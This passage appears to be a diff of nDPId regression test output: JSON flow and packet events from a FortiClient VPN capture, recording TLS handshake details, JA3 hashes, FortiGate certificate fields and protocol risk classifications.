OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067206773,"flow_last_seen":1621067206773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067206773,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1621067206773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067206773,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF0KMspKYnJAAAAALAC\/\/+2swAAAgQFtAEDAwUBAQgKJ6dItwAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1621067206833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067206833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA85JFAADQGH3JSUS4NwKgBsijL8XTNezJoKSmJyqASOED3YgAAAgQFrAQCCAoGP5HkJ6dItwEDAwo="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1621067206833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067206833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF0KMspKYnKzXsyaYAQECxOAgAAAQEICienSPMGP5Hk"} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067206773,"flow_last_seen":1621067206977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067206977,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067206773,"flow_last_seen":1621067207049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067207049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067206773,"flow_last_seen":1621067207050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067207050,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067209199,"flow_last_seen":1621067209199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067209199,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1621067209199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067209199,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF8KMsekCMzAAAAALAC\/\/8eiQAAAgQFtAEDAwUBAQgKJ6dSCQAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1621067209262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067209262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA81pJAADQGLXFSUS4NwKgBsijL8XxcuXqIHpAjNKASOECG6AAAAgQFrAQCCAoGP5LWJ6dSCQEDAwo="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1621067209262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067209262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF8KMsekCM0XLl6iYAQECzdhQAAAQEICienUkcGP5LW"} -01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067209199,"flow_last_seen":1621067209264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1621067209264,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067209199,"flow_last_seen":1621067209346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1753,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1621067209346,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01474{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067209199,"flow_last_seen":1621067209348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1621067209348,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1621067203571,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3422,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} -00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1621067204622,"flow_last_seen":1621067205708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6751,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} -00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1621067205651,"flow_last_seen":1621067206738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3853,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} -00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1621067206773,"flow_last_seen":1621067207860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7276,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} -00964{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1901,"flow_first_seen":1621067209199,"flow_last_seen":1621067222261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":277457,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067203571,"flow_last_seen":1621067203571,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067203571,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1621067203571,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067203571,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFtKMutlmzOAAAAALAC\/\/9bnAAAAgQFtAEDAwUBAQgKJ6c8YwAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1621067203633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067203633,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8pJBAADQGX3NSUS4NwKgBsijL8W1kEcpBrZZsz6ASOEBvHAAAAgQFrAQCCAoGP5CkJ6c8YwEDAwo="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1621067203633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067203633,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFtKMutlmzPZBHKQoAQECzFugAAAQEICienPKAGP5Ck"} +01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067203571,"flow_last_seen":1621067203776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1621067203776,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01129{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067203571,"flow_last_seen":1621067203852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1611,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1621067203852,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067203571,"flow_last_seen":1621067203854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":374,"midstream":0,"thread_ts_msec":1621067203854,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067204622,"flow_last_seen":1621067204622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067204622,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1621067204622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067204622,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFuKMux1NwAAAAAALAC\/\/\/kHgAAAgQFtAEDAwUBAQgKJ6dAbwAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1621067204682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067204682,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8DZFAADQG9nJSUS4NwKgBsijL8W6yVLN5sdTcAaASOEC\/ugAAAgQFrAQCCAoGP5ENJ6dAbwEDAwo="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1621067204682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067204682,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFuKMux1NwBslSzeoAQECwWWwAAAQEICienQKoGP5EN"} +01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067204622,"flow_last_seen":1621067204827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067204827,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067204622,"flow_last_seen":1621067204898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067204898,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 